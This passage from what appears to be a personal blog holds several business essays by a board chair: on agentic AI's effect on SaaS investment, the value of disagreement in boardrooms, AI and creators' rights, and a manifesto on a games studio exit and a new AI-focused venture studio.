    The companies that survive this shift will not be those that simply provide software. They will be those that control data, own critical workflows, operate in trusted domains, and can price based on outcomes rather than user seats. This is not the death of software. It is the transition from SaaS 1.0 to something much more autonomous.

    The Venture Capital Perspective

    From a venture capital perspective, software investment is not slowing down — but the type of software being funded is changing rapidly. AI companies accounted for the majority of venture capital investment in 2025, with roughly 61% of global VC funding going into AI-related companies [1]. Enterprise adoption is also accelerating quickly. One report found that 76% of enterprise AI deployments were purchased solutions rather than internally built systems [2]. In other words, investors are still enthusiastic about software businesses. They are simply shifting their capital toward AI-native platforms, vertical AI applications and agent-enabled workflow systems.

    What venture capitalists are becoming more cautious about is traditional SaaS that sits in the middle of a workflow but does not own the underlying data, decision logic, or automation layer. If an AI agent can orchestrate work across multiple tools, the value of those tools changes dramatically. The key question VCs now ask founders is simple: Why will your software still matter when AI agents can do the work themselves?

    Private Equity’s View

    Private equity investors are approaching the issue with characteristic pragmatism. Technology remains one of the most active sectors for private equity investment. Tech deals represented around 22% of North American private equity transactions in early 2025, and funds still hold hundreds of billions in undeployed capital targeting technology assets [3]. But the classic private equity SaaS playbook is under pressure. For years, PE firms could acquire a promising SaaS company, rely on rapid market expansion, increase revenue growth, and benefit from multiple expansion. Historically, the majority of value creation in technology buyouts came from revenue growth and valuation increases rather than operational improvements [3].

    Today that strategy looks more fragile. Higher interest rates, slower SaaS growth curves, and the disruptive potential of AI are forcing PE firms to become more selective. They are increasingly focused on companies that can use AI to improve margins, automate operations, and deepen product differentiation. In other words, private equity is not abandoning SaaS. It is simply demanding that SaaS businesses evolve into AI-enabled platforms with durable competitive advantages.

    The Family Office Perspective

    Family offices provide a particularly interesting perspective because their investment horizons are often longer and their capital structures more flexible. Most family offices already have some exposure to artificial intelligence. One report suggested that around 86% of family offices now have AI exposure, primarily through public market investments [4]. At the same time, around 65% intend to increase their focus on AI-related investments in the coming years [5].

    However, family offices are also becoming more cautious about valuations and private market liquidity. Despite this caution, both AI and SaaS continue to attract significant family office capital. In fact, venture deal values involving family offices more than doubled for both AI/ML and SaaS companies between 2023 and 2025, even though the total number of deals declined [6]. What this tells us is that family offices are concentrating capital into fewer, higher-quality opportunities rather than retreating from the sector entirely.

    They are asking the same question as other investors: Does this software business still matter in a world where intelligent agents are everywhere?

    My Conclusion

    So, will Agentic AI be the nail in the coffin for SaaS? For weak SaaS businesses, possibly yes. Companies with shallow product differentiation, limited data advantages and purely seat-based pricing models may find their value proposition eroded as automation expands. But for strong software companies, Agentic AI is not a coffin — it is a catalyst. It pushes the industry toward outcome-based software, deeper automation, and products that sit closer to real economic activity rather than simply organizing information. The companies that win in the next decade will not be those that simply manage workflows. They will be the ones whose systems actually perform the work, control the data, and deliver measurable outcomes.

    Serious investors are not turning away from software. They are simply becoming less tolerant of SaaS businesses that cannot explain why they will still matter in an AI-native world. And that may ultimately be the healthiest thing that could happen to the software industry.

    References

    [1] OECD – Venture Capital Investments in Artificial Intelligence Through 2025

    [2] Menlo Ventures – State of Generative AI in the Enterprise Report

    [3] Bain & Company – Global Technology Report 2025

    [4] Goldman Sachs – Family Office Investment Insights Report

    [5] J.P. Morgan – Global Family Office Report 2026

    [6] PwC – Global Family Office Deals Study 2025

  • The Importance of Board Disagreements

    The Importance of Board Disagreements

    Corporate boards exist at the heart of modern governance. They sit between ownership and management, responsible for ensuring that organisations are directed and controlled in ways that create long-term value while protecting the interests of stakeholders. The board’s responsibilities include oversight of strategy, monitoring performance and risk, and ensuring accountability to shareholders, regulators and society at large. Directors are therefore not merely advisers to management; they are stewards of the enterprise and must exercise independent judgement in the interests of the organisation’s future. 

    In practice, this responsibility requires boards to do far more than simply endorse the views of executives. The board’s purpose is to challenge, test and refine management thinking. Good governance depends on maintaining a clear distinction between those who run the company day-to-day and those who oversee its direction. Executives manage operations, while the board provides oversight, strategic guidance and accountability, ensuring that management decisions are aligned with the long-term interests of the company and its stakeholders. 

    One of the most misunderstood aspects of board effectiveness is the role of disagreement. Many people unfamiliar with governance assume that a well-functioning board should be harmonious and unified. In reality the opposite is often true. Healthy disagreement is not a sign of dysfunction but of engagement. When directors bring different perspectives, experiences and expertise into the room, debate becomes a powerful tool for better decision-making. Research on boardroom dynamics shows that “vigorous dissent” around strategic issues improves decision quality and helps boards avoid groupthink. 

    The danger of excessive consensus is that it can allow the status quo to persist unchallenged. Organisations, particularly successful ones, can easily fall into patterns of thinking that go unquestioned over time. Boards are uniquely positioned to disrupt this complacency. Non-executive directors and chairs are deliberately placed one step removed from daily management so that they can bring independence of thought and a broader perspective. Their role is to ask difficult questions: Why are we pursuing this strategy? What risks are we overlooking? What alternative options should be considered?

    Throughout my own career as a Chair and Non-Executive Director across multiple organisations, I have repeatedly seen how constructive disagreement strengthens decision-making. Boards are composed of individuals with different backgrounds, sectors of experience and personal insights. When those perspectives collide respectfully, they force deeper analysis and more robust conclusions. The best boardrooms I have been part of were not silent or overly polite; they were intellectually demanding environments where directors felt confident enough to question assumptions and challenge the executive team.

    This dynamic is essential because boards carry responsibilities that extend beyond shareholders alone. Directors must consider the impact of decisions on employees, customers, suppliers, communities and other stakeholders. Modern corporate governance frameworks emphasise the duty of directors to act in good faith and in the best interests of the company while balancing the expectations of multiple stakeholder groups. Such complexity inevitably generates differing viewpoints. A strategy that benefits shareholders in the short term may carry risks for employees or long-term sustainability. Debate in the boardroom allows those competing considerations to be surfaced and evaluated properly.

    The role of the Chair is particularly important in managing this process. Encouraging disagreement does not mean allowing conflict to become personal or destructive. Effective chairs create an environment where directors feel able to express opposing views while maintaining respect and trust among board members. Governance research distinguishes between “task conflict,” which focuses on differing ideas and strategies, and “relationship conflict,” which becomes personal and damaging. The challenge is to foster the former while preventing the latter. 

    In practice, this often means structuring discussions carefully and ensuring that every voice in the room is heard. Some directors are naturally more vocal than others, and the Chair must ensure that quieter members are invited into the debate. Diverse boards—whether in terms of professional background, gender, nationality or sector experience—tend to generate richer discussions precisely because they bring different mental models to the table. Diversity, therefore, is not only a social or ethical consideration but also a governance advantage.

    Yet disagreement is only the first step. Ultimately, a board must reach decisions. One of the defining features of effective governance is the ability of directors to debate vigorously and then unite behind a collective conclusion. Once a board decision is made, it becomes the responsibility of all directors to support that outcome publicly, even if individual members initially held different views. This principle of collective responsibility ensures that management receives clear direction and that the organisation benefits from decisive leadership.

    This pattern—robust debate followed by unified commitment—is one I have observed repeatedly across boards in different sectors. The discussions may be intense, the perspectives strongly held, and the analysis detailed. But when the process is conducted professionally and respectfully, the final outcome is almost always stronger than any single viewpoint brought into the room at the beginning.

    In an era of increasing complexity—technological disruption, regulatory change, sustainability pressures and geopolitical uncertainty—the importance of strong board governance has never been greater. Boards must guide organisations through uncertain terrain while safeguarding long-term value and stakeholder trust. To do this effectively, they must resist the temptation of easy consensus.

    The most effective boards are those where disagreement is not feared but welcomed. When directors challenge each other and the executive team with intellectual rigour, the board fulfils its true purpose: ensuring that decisions are examined from multiple perspectives and that the organisation moves forward with clarity and confidence. In that sense, disagreement in the boardroom is not a weakness. It is one of governance’s greatest strengths.

  • AI, Creativity, and the Next Rights Settlement: Why We Must Build the Future Without Hollowing Out the Artists

    AI, Creativity, and the Next Rights Settlement: Why We Must Build the Future Without Hollowing Out the Artists

    Alternate title:  From Tools to Teammates: AI’s Creative Upside — and the Rights Reckoning We Can’t Avoid

    I’ve spent much of my professional life watching industries change when a new “general‑purpose” technology arrives. Telecoms did it with digitisation and the smartphone. Media did it with streaming. Now the creative industries are doing it with generative AI — tools that can draft, compose, visualise, summarise, mimic and remix at a scale that would have sounded implausible a few years ago.

    When I speak with artists, producers, commissioners, publishers, and the engineers building these systems, I hear two truths at once. First: AI is expanding what creative people can do. Second: the current economics and governance of AI risk extracting value from the creative ecosystem faster than it can replenish itself. The optimistic story and the cautionary story are both real. The question is whether we can hold on to the upside while fixing the terms of trade.

    A vivid example captures the moment. When will.i.am and Mercedes‑Benz set out to re‑imagine the electric driving experience, they built a system where music can be separated into components — drums, melody, vocals, synth — and then recomposed in real time using live signals from the vehicle: acceleration, braking, steering and suspension travel. The result isn’t a playlist; it’s an adaptive soundtrack shaped by the way you drive. Projects like MBUX Sound Drive are a clue: AI’s most interesting creative applications are rarely about replacing people. They’re about new formats that weren’t previously possible.

    That kind of work depends on people comfortable living in two worlds at once: code and culture. One of the most compelling thinkers I’ve read at this intersection is Manon Dave, who leads the Future World Design team within BBC Research & Development — a remit focused on what “public service creativity” becomes in an age of AI, immersive media and creator economies.

    Spending time listening and reading people like Dave shifts how you think about AI. It’s not a single tool; it’s a new layer of capability. Used well, it compresses the distance between idea and execution. It lowers the cost of iteration. It expands the palette. It gives you a collaborator that never runs out of patience — a sounding board you can ask for ten variations, then a hundred more in a different style. For early adopters, that matters most at the exact points where creative work often stalls: writer’s block, a sonic idea you can’t quite capture, a concept that needs “one more angle” to land.

    This is where the public debate sometimes misses the point. Too much of it is framed as “will AI replace creators?” In most real creative workflows, replacement is not the right model. Collaboration is. Contemporary pop is commonly written by teams; major productions involve dozens of specialist roles. Creative work is already multi‑author. AI becomes another participant — but one whose contribution must be governed and accounted for if we want the ecosystem to remain fair.

    Historical analogies help us stay calm, but they don’t let us be complacent. When the synthesizer arrived, it provoked predictable anxiety. When Auto‑Tune became mainstream, it was treated as scandalous by some and indispensable by others. In time, both technologies became part of the standard toolkit, and the world didn’t end. What audiences ultimately rewarded was taste, originality and emotional truth.

    Generative AI differs from prior creative technologies in one crucial respect: how it learns. A synthesizer doesn’t need millions of recordings to be ingested. Auto‑Tune doesn’t require training on the back catalogue of human voices. Generative models, by contrast, are built by training on large datasets — and those datasets often contain copyrighted works. That’s why rights, consent and attribution aren’t side issues. They are the central issues.

    If AI becomes a system that can ingest the world’s creative output, learn from it, and then compete with it — while creators have no practical way to see what was taken, no practical way to license it, and no practical way to be paid — the long‑term result is a slow hollowing out. We get more content, cheaper content, faster content — and fewer sustainable careers to create the next generation of high‑quality work.

    We can already see the same tension in journalism, where publishers argue that large‑scale scraping and reuse by AI systems is undermining the economics of original reporting. When major UK news organisations coordinate publicly to push for standards around consent, attribution and licensing, that is a signal that the basic value exchange is breaking down.

    At the same time, we have to engage honestly with the arguments on the other side. AI developers — and some policymakers — claim broad access to data is necessary for innovation; that training is “transformative” rather than substitutive; and that heavy disclosure requirements could slow progress or expose commercial secrets. In the United States, at least one significant court ruling has leaned toward the view that training on copyrighted books can be fair use in certain circumstances, even while condemning the storage of pirated copies — a reminder that the legal landscape is contested and evolving.

    So what do we do? I think we need to treat “AI and creativity” as three problems with three kinds of remedies.

    The first is the fun one: keep building genuinely new formats — work that is additive rather than extractive. Sound Drive is interesting because it’s about interaction, not imitation. The same is true of experiments that make audio more immersive, make education more adaptive, or make accessibility features more powerful. In a BBC context, the most interesting question isn’t “can a model write a script?” It’s “what does public service storytelling look like when information can be contextual, conversational and responsive — and when audiences can participate rather than merely receive?” A modern re‑imagining of Ceefax for the age of conversational systems isn’t about replacing journalists. It’s about adding a layer of context that helps audiences make sense of what they’re already watching, without destroying the shared experience of watching together.

    The second is the “boring plumbing”: attribution, provenance and authenticity. If we can’t say where media came from, how it was edited, and what tools were used, trust collapses — and with it, the ability to pay creators for verified work. That’s why open provenance standards such as C2PA matter. They are not a silver bullet, but they are the kind of infrastructure that makes a healthier ecosystem possible in a world of cheap synthetic media.

    The third is the hard one: an enforceable rights settlement for training data and downstream use, built on four basics — meaningful consent, workable transparency, scalable remuneration, and accountability across the value chain.

    If those principles feel demanding, consider the alternative. Without them, we will drift into a market where a small number of platform companies capture most of the value, while creative labour is treated as an unpriced input. That outcome is not inevitable — but it will happen by default if we don’t actively design against it.

    I’m also wary of the lazy claim that AI will “level the playing field” automatically. It can, but only under certain conditions. AI gives superpowers to people who already have taste, craft and domain knowledge. A strong writer uses it to explore structure and argument faster. A skilled producer uses it to audition sonic ideas and refine arrangement choices. A great designer uses it to test composition and iterate. But when the foundation isn’t there, you often get a glossy imitation: technically passable, emotionally empty, instantly forgettable. In a market flooded with that kind of output, genuine skill becomes more valuable — but only if the economics of skill remain viable.

    I’m cautiously optimistic about the next decade. Entertainment will become more adaptive. Interfaces will become more personalised. Media will become more conversational. The best experiences will be those that treat AI as a co‑pilot, not an author — a system that helps humans do more human things, not less.

    But optimism is not a plan. A plan requires institutions — broadcasters, publishers, labels, collecting societies, regulators, standards bodies, and responsible AI developers — to align on foundations: workable licensing models, provenance standards embedded into tools and platforms, and transparency requirements that don’t collapse under lobbying. Above all, we need to make it easy for a creator — not just a major corporation — to set the terms under which their work can be used.

    The best future is one where creators can experiment with AI freely, where new forms flourish, and where rights are respected not as an afterthought but as a design constraint. If we get that right, AI will not be the end of creativity. It will be the beginning of a new creative era — one that rewards imagination and craftsmanship while ensuring the people who make culture can still make a living from it.

  • From Exit to Re‑Entry: A Manifesto for Agentic AI, Living Worlds, and the Next Era of Games

    From Exit to Re‑Entry: A Manifesto for Agentic AI, Living Worlds, and the Next Era of Games

    I have spent much of my professional life at the intersection of creativity, technology, and commercial reality. Games sit precisely at that crossroads. They are cultural artefacts, technical achievements, and economic engines all at once. When they succeed, it is because those three forces are aligned. When they fail, it is almost always because one has been allowed to dominate the others.

    This manifesto explains why exiting Lucid Games was the right decision at the right time, why I am now re‑entering the market through WayBeyond Capital Ventures, and why agentic AI represents not just another toolset, but a structural shift in how interactive (and many other) worlds will be imagined, built, governed, and sustained.

    This is written not as a prediction, but as a position.

    Technology has always been the canvas, not the backdrop

    Game developers have never waited for technology to mature politely. They push it, bend it, and often break it. From early arcade machines to modern real‑time engines, games have consistently acted as stress tests for computation, graphics, networking, and human‑computer interaction, indeed it is arguable that’s why GPU’s were invented!

    What matters is not raw capability, but what capability enables creatively. Each technological step forward reshapes production methods, team structures, budgets, and ultimately player expectations. That is why the current moment matters so much.

    Agentic AI is not an incremental improvement on existing tools. It represents a change in ‘kind’, not just degree.

    Unlike generative systems that respond to prompts, agentic systems can pursue goals, maintain memory, adapt strategies, and operate across multiple steps without constant human instruction. When applied to games, this changes the nature of interaction itself. It moves us from scripted illusion toward genuine behavioural complexity.

    Why the Lucid Games exit mattered

    Lucid Games was a Liverpool‑born studio that proved it could operate on the global stage. As the chairman I was there from the beginning.

    The team delivered under pressure, navigated the realities of AAA expectations, and demonstrated real creative and technical capability.

    In July 2023, Lucid Games was acquired by LightSpeed Studios, a Tencent subsidiary. This was a pivotal moment for the company and for those of us involved in its governance. The acquisition validated the value that had been built and placed the studio within a platform capable of offering scale, stability, and long‑term runway.

    For me, it was a strategically clean exit.

    Exits are often mischaracterised as abandonment or retreat. In reality, a good exit is an act of stewardship. It recognises when a company’s next phase is better served inside a larger ecosystem, and when value creation has reached a point where risk and reward are no longer proportionate for existing stakeholders.

    The Lucid transaction crystallised value, reduced execution risk, and created something far more important than capital: optionality.

    The acquisition positioned Lucid within a global AAA platform with deep resources and long‑term publishing ambition. For the board and shareholders, it represented a successful outcome in a market increasingly characterised by consolidation and rising development costs.

    Optionality creates perspective

    Optionality buys time. Time allows reflection. Reflection reveals patterns.

    Stepping away from day‑to‑day studio operations made one thing abundantly clear: the industry is approaching another structural inflection point. Rising costs, longer development cycles, player fatigue with formulaic content, and increasing scrutiny around monetisation have all created pressure.

    Agentic AI arrives into this environment not as a silver bullet, but as a catalyst. It will not fix bad design, weak leadership, or exploitative business models. But it will amplify whatever philosophy sits beneath it.

    That is why the question is not “will agentic AI be used in games?” The question is “who will use it well, and to what end?”

    From scripted worlds to living systems

    For decades, so‑called AI in games has been built on scripts, decision trees, and bounded randomness. These techniques have delivered remarkable experiences, but they are ultimately fragile illusions. Once players see the seams, immersion collapses.

    Agentic AI offers a path toward worlds that are not merely decorated with activity, but structured around agency.

    Non‑player characters can pursue goals independently of the player. Worlds can respond systemically rather than reactively. Narrative becomes less about authored sequences and more about shaped possibility spaces.

    This does not eliminate the role of the designer. On the contrary, it elevates it. Designers move from writing behaviours to designing *conditions*. From scripting events to shaping ecosystems.

    Why a venture studio, not another studio

    When I decided to re‑enter the market, I was deliberate about structure. I did not want to build “another games company” in the traditional sense. The opportunity is broader than any single title.

    That is why with a set of brilliant strategists I founded WayBeyond Capital Ventures as a venture studio.

    A venture studio is suited to moments of systemic change. It allows multiple ideas to be explored in parallel, shared infrastructure to be developed once, and talent to move fluidly across initiatives. It also allows governance, safety, and ethics to be embedded by design rather than bolted on later.

    WayBeyond Capital Ventures operates across technology, media, and telecommunications, because agentic systems do not respect sector boundaries. Games will be one of the most visible beneficiaries — but not the only one.

    The agentic lenses guiding re‑entry

    My re‑entry into gaming is guided by a set of lenses. These are not slogans. They are filters through which every opportunity is assessed.

    1. Living worlds, not larger maps 
    Scale is no longer measured in square kilometres. It is measured in density of believable behaviour. A small world that reacts intelligently will always outperform a vast but empty one.

    2. Agents as referees, not manipulators 
    Agentic systems can balance difficulty, detect unfair play, and manage pacing. Used correctly, they enhance trust. Used poorly, they become instruments of coercion.

    3. Production compression without creative hollowing 
    AI‑driven tools can remove enormous amounts of friction from development. But speed without taste produces mediocrity. Human judgement must remain central.

    4. Trust, safety, and governance by design 
    Agents can be subverted, manipulated, and pushed into unsafe behaviour. Robust guardrails, monitoring, and intervention systems are not optional — they are product fundamentals.

    5. Ethical monetisation as a hard constraint 
    An agent that emotionally nudges spending or withholds progress crosses a line. Long‑term value is built on respect, not exploitation.

    6. Augmenting, not erasing, human creativity 
    The future of games is not creator‑less. It is creator‑amplified. Removing drudgery should create space for imagination, not unemployment.

    The cultural responsibility of believable systems

    As worlds become more lifelike, the cultural responsibility of those who build them increases. Players form emotional relationships with characters, communities, and identities within games. Agentic systems deepen those bonds.

    That power must be handled carefully.

    Designers and leaders must ask not only “can we?” but “should we?” Not everything that is technically possible is culturally healthy or commercially sustainable.

    This is where governance becomes a competitive advantage rather than a compliance burden.

    Exit as preparation, not conclusion

    The Lucid exit was not the end of a chapter. It was the preparation for the next one.

    It created the distance needed to see clearly, the freedom to choose deliberately, and the responsibility to engage thoughtfully. Re‑entering the market now is not about chasing novelty. It is about shaping direction.

    Agentic AI will either deepen the medium or cheapen it. It will either empower creativity or industrialise it into sameness. The outcome depends entirely on the values of those who deploy it.

    The commitment

    WayBeyond Capital Ventures exists to back teams, platforms, and ideas that take this responsibility seriously. To build worlds that feel alive because they are coherent, responsive, and respectful — not because they are manipulative or overwhelming.

    This is not a call for unchecked acceleration. It is a call for disciplined imagination.

    The next era of games (and many other creative industries) will not be defined by how intelligent our systems become, but by how wisely we choose to use that intelligence.

    That is the work ahead. And that is why I am back.